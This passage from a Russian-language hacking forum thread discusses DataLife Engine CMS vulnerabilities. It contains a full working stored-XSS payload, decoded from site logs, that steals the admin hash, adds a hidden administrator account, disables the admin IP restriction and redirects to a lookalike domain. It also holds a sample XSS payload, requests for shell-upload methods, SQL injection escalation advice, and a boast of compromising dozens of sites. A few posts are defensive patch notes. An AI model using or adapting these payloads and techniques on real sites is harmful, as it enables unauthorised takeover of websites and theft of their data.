[ Обзор уязвимостей DataLife Engine ]

Discussion in 'Веб-уязвимости' started by Solide Snake, 28 Oct 2007.

  1. hpol

    hpol Elder - Старейшина

    Joined:
    11 Dec 2013
    Messages:
    62
    Likes Received:
    16
    Reputations:
    15
    походу переменная $align
     
  2. ChocolatePuma

    ChocolatePuma New Member

    Joined:
    25 Sep 2016
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Думаю что если что то передать $align, то это может выльется в XSS атаку. я прав?
    примерно:
    [im*g=<script>alert('XSS');</script>]$url[im*g]
     
  3. ChocolatePuma

    ChocolatePuma New Member

    Joined:
    25 Sep 2016
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Будет ли правильно заменить:
    if ($allign != "")
    на
    if (!empty($allign))
     
  4. Dr3DD

    Dr3DD New Member

    Joined:
    23 Dec 2016
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Есть определенный ресурс, на нем есть фотогалерея с возможностью поиска. При поиске <script>alert('xss')</script> выбивает mysql error 1064. Как можно раскрутить ?

    Скрин с содержанием error'a- http://clip2net.com/s/3FNfdVk
     
    #344 Dr3DD, 23 Dec 2016
    Last edited: 23 Dec 2016
  5. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    По идее можно, sqlmap пробуй
     
    Chrome~ likes this.
  6. Dr3DD

    Dr3DD New Member

    Joined:
    23 Dec 2016
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Пробовал, не але... Есть еще варианты ?
     
  7. Zwer1992

    Zwer1992 New Member

    Joined:
    7 Nov 2015
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Это дыра на многих сайтах есть или только на твоём?
     
  8. Dr3DD

    Dr3DD New Member

    Joined:
    23 Dec 2016
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Других сайтов с данным модулем не находил... Модуль фотогаллерея от "Клуб Админов".
     
  9. airatos

    airatos New Member

    Joined:
    17 Dec 2010
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    Новая уязвимость

    Проблема:
    Недостаточная фильтрация данных.

    Ошибка в версии: 11.2 и ниже

    Степень опасности: Высокая

    Для исправления откройте файл: /engine/go.php и найдите:
    Code:
    $url = @str_replace ( "&amp;", "&", $url );
    ниже добавьте
    Code:
    $url = htmlspecialchars( $url, ENT_QUOTES, $config['charset'] );
    $url = str_replace ( "&amp;", "&", $url );
     
  10. pupsik13

    pupsik13 New Member

    Joined:
    7 Mar 2017
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Смотрел логи некоторых сайтов, после base64 decode вышло
    HTML:
    "></a>
    
    <code style='display: none;' id='LJKwqoiDHqewE'></code>
    <script>
    function A(){
    var q;
    try{q=new ActiveXObject("Msxml2.XMLHTTP");}catch(e){try{q = new ActiveXObject("Microsoft.XMLHTTP");}catch (E){
    q = false;}}if(!q && typeof XMLHttpRequest!='undefined'){q = new XMLHttpRequest();}return q;
    }
    var rp="/";
    var ul="petromadsss";
    var up="d1478963D";
    var um="[email protected]";
    var objhttp=A();
    objhttp.onreadystatechange = function()
    {
        if (objhttp.readyState == 4)
        {
            var r=new RegExp(atob('ZGxlX2FkbWluXHMqPVxzKignfCIpKC4rPykoJ3wiKQ=='));
            var da=r.exec(objhttp.responseText)[2];
            r=new RegExp(atob('ZGxlX2xvZ2luX2hhc2hccyo9XHMqKCd8IikoLis/KSgnfCIp'));
            var dh=r.exec(objhttp.responseText)[2];
            objhttp.open("POST",rp+da+'?mod=editusers&action=list',true);
            objhttp.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
            objhttp.send('action=adduser&user_hash='+dh+'&mod=editusers&regusername='+ul+'&regpassword='+up+'&regemail='+um+'&reglevel=1');
            var objhttp2=A();
            objhttp2.onreadystatechange=function()
            {
                if(objhttp2.readyState==4)
                {
                    var sd=document.getElementById('LJKwqoiDHqewE');
                    sd.innerHTML=objhttp2.responseText.replace(/(<script)/i,'');
                    var ael=sd.getElementsByTagName('*');
                    var pd='';
                    r=new RegExp(atob('XihzYXZlX2Nvbik='));
                    for(var i=0;i<ael.length;i++)
                        if(r.test(ael[i].name))
                            pd=pd+ael[i].name+'='+encodeURIComponent(ael[i].value)+'&';
                    pd=pd+'save_con[admin_allowed_ip]=&mod=options&action=dosavesyscon&user_hash='+dh;
                    var objhttp3=A();
                    objhttp3.open('POST',rp+da+'?mod=options&action=syscon',true);
                    objhttp3.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
                    objhttp3.send(pd);
                    window.location.href = "http://g00gleapis.ru/81NJLH";
                }
            }
            objhttp2.open('GET',rp+da+'?mod=options&action=syscon',true);
            objhttp2.send(null);
        }
    
    }
    objhttp.open('GET', rp, true);
    objhttp.send(null);
    </script><a href="http://g00gleapis.ru/81NJLH
     
  11. Leendesst

    Leendesst New Member

    Joined:
    20 Nov 2016
    Messages:
    64
    Likes Received:
    0
    Reputations:
    0
    Ребята, нужен способ заливки шелла, версия 10.5, форум стоит Xenforo 1.5.14. Может кто чего подскажет? Могу подкинуть Dom XSS, способ для личного пользования нужен)
     
  12. airatos

    airatos New Member

    Joined:
    17 Dec 2010
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    Баг фикс

    Проблема: Недостаточная фильтрация данных в Jquery плагине Masha JS входящем в состав DLE.

    Ошибка в версии: 11.3 и ниже

    Степень опасности: Высокая

    Для исправления скачайте и скопируйте на свой сервер патч: https://dle-news.ru/files/dle113_path.zip

    После чего очистите кеш браузера, и кеш скрипта в админпанели. Данный патч предназначен для версии 11.3 и всех версий ниже 11.3.
     
  13. airatos

    airatos New Member

    Joined:
    17 Dec 2010
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    Кто знает как использовать этот баг с Masha JS?
     
  14. Leendesst

    Leendesst New Member

    Joined:
    20 Nov 2016
    Messages:
    64
    Likes Received:
    0
    Reputations:
    0
    Это и сесть моя DOM XSS. Я при помощи этой баги слил пару десятков сайтов. Она обходит даже xss аудитор от гугла ласт версии. Можно сделать сценарий на получение админ аккаунта.
     
  15. EmpireAssasin

    EmpireAssasin New Member

    Joined:
    14 Aug 2017
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Получил группа админа через typograf,но админка защищена через окошко хттп авторизации.
    Есть идеи,что можно сделать(брутфорс пароля не пойдет,т.к. пароль там довольно не простой)?Хотелось бы базу выкачать.Еще кстати .htaccess файлы почему-то скачиваются,можно ли как-то выехать на этом?
     
  16. Leendesst

    Leendesst New Member

    Joined:
    20 Nov 2016
    Messages:
    64
    Likes Received:
    0
    Reputations:
    0
    На сколько я знаю, это расшифренный метод авторизации. Введи туда логин и пароль от аккаунта с админ правами.
     
  17. EmpireAssasin

    EmpireAssasin New Member

    Joined:
    14 Aug 2017
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Я тоже сначала так подумал,но во-первых,данные не подходят,во-вторых,они проверяются бесконечно,не банит айпи,в-третьих,при отмене пишет не "Access Denied", а "401". =)
     
  18. Leendesst

    Leendesst New Member

    Joined:
    20 Nov 2016
    Messages:
    64
    Likes Received:
    0
    Reputations:
    0
    Ну тогда лезь через форум =)
     
  19. EmpireAssasin

    EmpireAssasin New Member

    Joined:
    14 Aug 2017
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Еще бы он у них был xD
    Кстати говоря, для "быстрого редактирования" новости запрос делается в admin.php?
    Я почему-то отредактировать новость не могу,после нажатия кнопки "Сохранить" ничего не происходит,хотя удалять могу =\
     
  20. Leendesst

    Leendesst New Member

    Joined:
    20 Nov 2016
    Messages:
    64
    Likes Received:
    0
    Reputations:
    0
    Никогда с таким не сталкивался. Сколько хоть юзеров там?